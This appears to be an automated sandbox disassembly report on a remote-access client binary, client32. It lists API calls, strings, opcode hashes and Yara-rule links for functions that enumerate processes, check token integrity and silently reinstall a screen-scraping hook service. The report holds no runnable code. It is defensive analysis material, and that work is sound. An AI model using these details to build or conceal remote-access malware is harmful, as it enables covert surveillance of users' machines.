Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$ClassCloseCursorFromHandleNamePointRect$EnumIdleInputLongMessageOpenSendVersionWaitWindows_memset_strncpy
String ID: "%sNSClientTB.exe"$'$*ExitMetroBreak$*ExitMetroCloseDelay$ActivateStui=%d, @%d,%d, actwin=%x [%s]$ActivateStui=-1, @%d,%d, actwin=%x [%s]$Client$NSMCoolbar
API String ID: 4093120923-2853765610
Opcode ID: a37fe7b023270c55d5fac800e6c82e3ef41093a7139e55b8864d2da1d5655942
Instruction ID: 1967bb51930ead73ce48ca5e19d163332f2271a687d5ff16e8e37c73a50f3493
Opcode Fuzzy Hash: a37fe7b023270c55d5fac800e6c82e3ef41093a7139e55b8864d2da1d5655942
Instruction Fuzzy Hash: 82A1C575E01229AFDB11CFA0CCC5FAAB7B9EB4A704F1041F9E919A7280E7316944CF61

Function 110ED290 Relevance: 36.2, APIs: 24, Instructions: 222windowmemoryCOMMON

Download Yara Rule

APIs

GetObjectA.GDI32(?,00000018,?), ref: 110ED2AE
GetStockObject.GDI32(0000000F), ref: 110ED2C2
GetDC.USER32(00000000), ref: 110ED33A
SelectPalette.GDI32(00000000,00000000,00000000), ref: 110ED34B
RealizePalette.GDI32(00000000), ref: 110ED351
GlobalAlloc.KERNEL32(00000042,?,00000000), ref: 110ED36C
SelectPalette.GDI32(00000000,?,00000001), ref: 110ED380
RealizePalette.GDI32(00000000), ref: 110ED383
ReleaseDC.USER32(00000000,00000000), ref: 110ED38B

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Palette$ObjectRealizeSelect$AllocGlobalReleaseStock
String ID:
API String ID: 1969595663-0
Opcode ID: 460c3ef96ebe8ed115c01ac097ffa682f3726c3033c725e46577f46786f58dec
Instruction ID: 99ab53906cf2362fb71f393f1a059b673ec6ad63d3e9dfc730451934018f7e7b
Opcode Fuzzy Hash: 460c3ef96ebe8ed115c01ac097ffa682f3726c3033c725e46577f46786f58dec
Instruction Fuzzy Hash: 747193B1E01229AFDB01DFE9CC89BEEB7B9FF88714F148056FA15E7244D67499008B61

Function 111032F0 Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 239libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(psapi.dll,CF3D35D0,00000001,?,?,00000000,11185E66,000000FF,?,1110421F,00000000,?,?,?), ref: 1110332D

Part of subcall function 111347D0: GetVersion.KERNEL32(00000000,74DF0BD0,00000000), ref: 111347F3
Part of subcall function 111347D0: GetModuleHandleA.KERNEL32(ntdll.dll), ref: 11134814
Part of subcall function 111347D0: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 11134824
Part of subcall function 111347D0: GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 11134841
Part of subcall function 111347D0: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoA), ref: 1113484D
Part of subcall function 111347D0: _memset.LIBCMT ref: 11134867

FreeLibrary.KERNEL32(00000000,?,1110421F,00000000,?,?,?), ref: 1110337F
LoadLibraryA.KERNEL32(Kernel32.dll), ref: 111033B6
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 1110343F
GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 111034C1
SetLastError.KERNEL32(00000078), ref: 111034E3
SetLastError.KERNEL32(00000078), ref: 111034F0
OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 11103509
OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,?,?,?,1110421F), ref: 11103570
GetTokenInformation.ADVAPI32(?,0000000C(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,1110421F), ref: 11103597
CloseHandle.KERNEL32(?,?,?,?,?,?,1110421F), ref: 111035EF

Part of subcall function 11103110: GetTickCount.KERNEL32 ref: 1110313E
Part of subcall function 11103110: EnterCriticalSection.KERNEL32(111EC5C4), ref: 11103147
Part of subcall function 11103110: GetTickCount.KERNEL32 ref: 1110314D
Part of subcall function 11103110: GetTickCount.KERNEL32 ref: 111031A0
Part of subcall function 11103110: LeaveCriticalSection.KERNEL32(111EC5C4), ref: 111031A9

Part of subcall function 110F3BB0: WaitForSingleObject.KERNEL32(?,00000000,?,?,111049C5,?,TerminateVistaUI), ref: 110F3BC1
Part of subcall function 110F3BB0: InterlockedExchange.KERNEL32(?,00000000), ref: 110F3BCD
Part of subcall function 110F3BB0: CloseHandle.KERNEL32(00000000), ref: 110F3BD8
Part of subcall function 110F3BB0: InterlockedIncrement.KERNEL32(111EC5B4), ref: 110F3C05

CloseHandle.KERNEL32(00000000), ref: 111035F6
FreeLibrary.KERNEL32(00000000,?,?,?,?,1110421F), ref: 11103646
FreeLibrary.KERNEL32(00000000,?,?,?,?,1110421F), ref: 11103651

Strings

EnumProcesses, xrefs: 11103429
Kernel32.dll, xrefs: 111033B1
psapi.dll, xrefs: 11103328
ProcessIdToSessionId, xrefs: 111034BB

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: HandleLibrary$AddressProc$CloseCountFreeTick$CriticalErrorInterlockedLastLoadModuleOpenProcessSectionToken$EnterExchangeIncrementInformationLeaveObjectSingleVersionWait_memset
String ID: EnumProcesses$Kernel32.dll$ProcessIdToSessionId$psapi.dll
API String ID: 555709589-617439319
Opcode ID: b3600c8a1196151fdc18ced844d466fa8542599c62b3b8d15a5985b8e22f9588
Instruction ID: 7102d60838122e4a6cb8a6baed9df5fda1baf24c5a04c60c3b4407c25d2de74c
Opcode Fuzzy Hash: b3600c8a1196151fdc18ced844d466fa8542599c62b3b8d15a5985b8e22f9588
Instruction Fuzzy Hash: 80A14975D0426A9FDB249F558DC5ADEFBB4BB08304F4085EEE659E3240D7705AC08F61

Function 110F5300 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 162windowCOMMON

Download Yara Rule

APIs

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

SetCursor.USER32(00000000,?,00000000), ref: 110F53CB
ShowCursor.USER32(00000000), ref: 110F53D8
OpenEventA.KERNEL32(00100000,00000000,NSLockExit), ref: 110F53E9
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,?,000000BF), ref: 110F5413
GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F5432
TranslateMessage.USER32(?), ref: 110F5443
DispatchMessageA.USER32(?), ref: 110F544C
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000BF), ref: 110F5460
CloseHandle.KERNEL32(?), ref: 110F5473
GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F548B
TranslateMessage.USER32(?), ref: 110F549E
DispatchMessageA.USER32(?), ref: 110F54A7
GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 110F54BA
ShowCursor.USER32(00000001), ref: 110F54C2
SetCursor.USER32(?), ref: 110F54CF

Strings

NSLockExit, xrefs: 110F53DE

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$Cursor$DispatchMultipleObjectsShowTranslateWait$CloseEventHandleOpen_memsetwsprintf
String ID: NSLockExit
API String ID: 2358329513-1578567420
Opcode ID: 8e6a3f007d3c7767c2c9280eeeacc41a13dd947ceb4fa7b85dbd1afa2711b587
Instruction ID: da66d542c3fb9b9b9736b56b4e9605354d9b8fdeed183c23e7030b173a746b46
Opcode Fuzzy Hash: 8e6a3f007d3c7767c2c9280eeeacc41a13dd947ceb4fa7b85dbd1afa2711b587
Instruction Fuzzy Hash: 0451AC75E0032AABDB11DFA48C81FEDF7B8EB44718F1085A5E615E7184EB71AA40CF91

Function 111577B0 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 152windowCOMMON

Download Yara Rule

APIs

GetSubMenu.USER32(00000000,?), ref: 11157805
GetMenuItemCount.USER32(?), ref: 11157817
GetMenuItemCount.USER32(?), ref: 11157821
_memset.LIBCMT ref: 11157831
GetMenuItemInfoA.USER32(?,-00000001,00000001,?), ref: 11157858
DeleteMenu.USER32(?,-00000001,00000400,?,?), ref: 11157871
GetMenuItemCount.USER32(?), ref: 11157878
_memset.LIBCMT ref: 11157889
wsprintfA.USER32 ref: 1115790B
IsWindowVisible.USER32(75BF1A30), ref: 11157921

Strings

0, xrefs: 11157844
C, xrefs: 1115789E
&%d %s, xrefs: 111578FF
0, xrefs: 11157894

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$Item$Count$_memset$DeleteInfoVisibleWindowwsprintf
String ID: &%d %s$0$0$C
API String ID: 1944744249-1709426716
Opcode ID: 77f97b495f7733a266680904539a4bd5a8708f4ad21c4815dcaf4031efbd88c4
Instruction ID: 1e8589750d2a290717ebac9bef8f5a9acc43d2f8c320684ce06ac1595057c3e6
Opcode Fuzzy Hash: 77f97b495f7733a266680904539a4bd5a8708f4ad21c4815dcaf4031efbd88c4
Instruction Fuzzy Hash: 2551D4719006299BDB91CF64CC85BEEF7B8EF45318F4080D9E919A7240EB71AA81CF91

Function 110275D0 Relevance: 28.1, APIs: 7, Strings: 9, Instructions: 139processCOMMON

Download Yara Rule

APIs

Part of subcall function 11141710: GetVersionExA.KERNEL32(111ECE98,75BF8400), ref: 11141740
Part of subcall function 11141710: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114177F
Part of subcall function 11141710: _memset.LIBCMT ref: 1114179D
Part of subcall function 11141710: _strncpy.LIBCMT ref: 1114186A

Part of subcall function 110B6BD0: GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 110B6BF6
Part of subcall function 110B6BD0: GetProcAddress.KERNEL32(00000000), ref: 110B6BFD
Part of subcall function 110B6BD0: GetCurrentProcessId.KERNEL32(00000000), ref: 110B6C13

Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D

Part of subcall function 110EAED0: RegOpenKeyExA.KERNEL32(?,?,00000000,?,?,?,?,?,?,110EB538,?,?,00020019,CF3D35D0), ref: 110EAEEC

GetSystemMetrics.USER32(00000043), ref: 110276A4

Part of subcall function 11141240: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B

wsprintfA.USER32 ref: 110276CB

Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,75BF8400,?), ref: 1113F937
Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 1113F957
Part of subcall function 1113F8A0: CloseHandle.KERNEL32(00000000), ref: 1113F95F

wsprintfA.USER32 ref: 110276F5
_memset.LIBCMT ref: 11027730
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00000044,?), ref: 11027785
CloseHandle.KERNEL32(?), ref: 1102779C
CloseHandle.KERNEL32(?), ref: 110277A5

Strings

screenscrape, xrefs: 11027636
System\CurrentControlSet\Services\Gdihook5, xrefs: 1102765D
AutoInstallGdihook5, xrefs: 1102768B
Trying to reinstall gdihook5, xrefs: 11027737
"%sWINST32.EXE", xrefs: 110276EF
"%sWINSTALL.EXE", xrefs: 110276C5
Client, xrefs: 1102763B, 11027690
/Q /Q, xrefs: 11027709
D, xrefs: 1102773C

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Handle$CloseCreateFile$FolderModuleOpenPathProcess_memsetwsprintf$AddressCurrentMetricsNameProcSystemVersion__wcstoi64_strncpy
String ID: /Q /Q$"%sWINST32.EXE"$"%sWINSTALL.EXE"$AutoInstallGdihook5$Client$D$System\CurrentControlSet\Services\Gdihook5$Trying to reinstall gdihook5$screenscrape
API String ID: 1724249554-531500863
Opcode ID: 6aaef0e5ddedcf15d348c0cb49900692044a3b95a90220cee4c587b42f452f78
Instruction ID: d2b55fc42617096dc1e54143e0f6b596911c59ff24b6e1298e75f3af09eb386e
Opcode Fuzzy Hash: 6aaef0e5ddedcf15d348c0cb49900692044a3b95a90220cee4c587b42f452f78
Instruction Fuzzy Hash: 4B41FA74E4062AAAEB50DBA0CC85FEDF7B8AB14708F1041D5E929B72C0EB70B544CB54

Function 11003600 Relevance: 27.2, APIs: 18, Instructions: 171COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000004), ref: 11003641

Part of subcall function 1113EB70: SetBkColor.GDI32(?,00000000), ref: 1113EB84
Part of subcall function 1113EB70: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 1113EB99
Part of subcall function 1113EB70: SetBkColor.GDI32(?,00000000), ref: 1113EBA1

CreateSolidBrush.GDI32(00000000), ref: 11003655
GetStockObject.GDI32(00000007), ref: 11003660
SelectObject.GDI32(?,00000000), ref: 1100366B
SelectObject.GDI32(?,?), ref: 1100367C
GetSysColor.USER32(00000010), ref: 1100368C
GetSysColor.USER32(00000010), ref: 110036A3
GetSysColor.USER32(00000014), ref: 110036BA
GetSysColor.USER32(00000014), ref: 110036D1
GetSysColor.USER32(00000014), ref: 110036EE
GetSysColor.USER32(00000014), ref: 11003705
GetSysColor.USER32(00000010), ref: 1100371C
GetSysColor.USER32(00000010), ref: 11003733
InflateRect.USER32(?,000000FE,000000FE), ref: 11003750
Rectangle.GDI32(?,?,00000001,?,?), ref: 1100376A
SelectObject.GDI32(?,?), ref: 1100377E
SelectObject.GDI32(?,?), ref: 11003788
DeleteObject.GDI32(?), ref: 1100378E

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Color$Object$Select$BrushCreateDeleteInflateRectRectangleSolidStockText
String ID:
API String ID: 3698065672-0
Opcode ID: 56ef778c561154e7ee263f0b185169614b9585c0caa9249417da709c2b7b2529
Instruction ID: 957bd5f73e9a8dea8b5ac47b723ad43d79deaf2c42c8b5dd113390dc26e88d99
Opcode Fuzzy Hash: 56ef778c561154e7ee263f0b185169614b9585c0caa9249417da709c2b7b2529
Instruction Fuzzy Hash: 665150B5900309AFDB14DBA5CC85EBFF3BCEF98314F104918E612A7295D671B9448BB1

Function 11065730 Relevance: 26.5, APIs: 4, Strings: 11, Instructions: 261COMMON

Download Yara Rule

Strings

Compression Error. (s%d) NSMConnection::DoStream **** not selected ****, xrefs: 11065762
%02x , xrefs: 11065A48
Decompress error: %s, xrefs: 1106596D
F, xrefs: 11065959
DoStream error, been_reset=1, xrefs: 1106578A
nclen=%d, bytesleft=%d, cmd=%d (%x), nbytes_c=%d, nbytes_uc=%d, p=%x, p0=%x, xrefs: 1106594A
datalen + idata->recvbytes <= MAX_DEFLATE_SIZE (MAX_STREAMLEN), xrefs: 110657F7
%04x: %s, xrefs: 11065A70
offset=%04x, nbytes=%04x (%d), nc=x%x, xrefs: 110659A8
Decomp, nbytes_c=%d, xrefs: 110658B1
..\ctl32\Connect.cpp, xrefs: 110657F2, 110658C5, 11065AB0

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID:
String ID: %02x $%04x: %s$..\ctl32\Connect.cpp$Compression Error. (s%d) NSMConnection::DoStream **** not selected ****$Decomp, nbytes_c=%d$Decompress error: %s$DoStream error, been_reset=1$F$datalen + idata->recvbytes <= MAX_DEFLATE_SIZE (MAX_STREAMLEN)$nclen=%d, bytesleft=%d, cmd=%d (%x), nbytes_c=%d, nbytes_uc=%d, p=%x, p0=%x$offset=%04x, nbytes=%04x (%d), nc=x%x
API String ID: 0-4168416193
Opcode ID: f7a8c51b6d0f86f07b72f365fa186225f6b47ea591ca1aecff19d1f68f376829
Instruction ID: 6bc3b423fe9e58ad3992282e61b86e9f2554b466721a9916031d5a1a83f6629d
Opcode Fuzzy Hash: f7a8c51b6d0f86f07b72f365fa186225f6b47ea591ca1aecff19d1f68f376829
Instruction Fuzzy Hash: 6FA15D75E012299FDB24CF64CC81BEEB7B9BF49744F5040E9E949A7240E7316A80CF91

Function 11051680 Relevance: 26.5, APIs: 4, Strings: 11, Instructions: 243COMMON

Download Yara Rule

APIs

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Part of subcall function 110ADA10: _sprintf.LIBCMT ref: 110ADA76

_memset.LIBCMT ref: 110518AA
_memset.LIBCMT ref: 110518F7
_memmove.LIBCMT ref: 11051949
_free.LIBCMT ref: 1105199A

Strings

RUNPLUGIN2, xrefs: 11051753
Northpoint, xrefs: 11051833
pnc != NULL, xrefs: 110516EC
DoNSMProtect - Turn ON, xrefs: 11051785
CLTCONN.CPP, xrefs: 110516CC, 110516E7
DoNSMProtect - PASSWORDS DO NOT MATCH!!!, xrefs: 110519B1
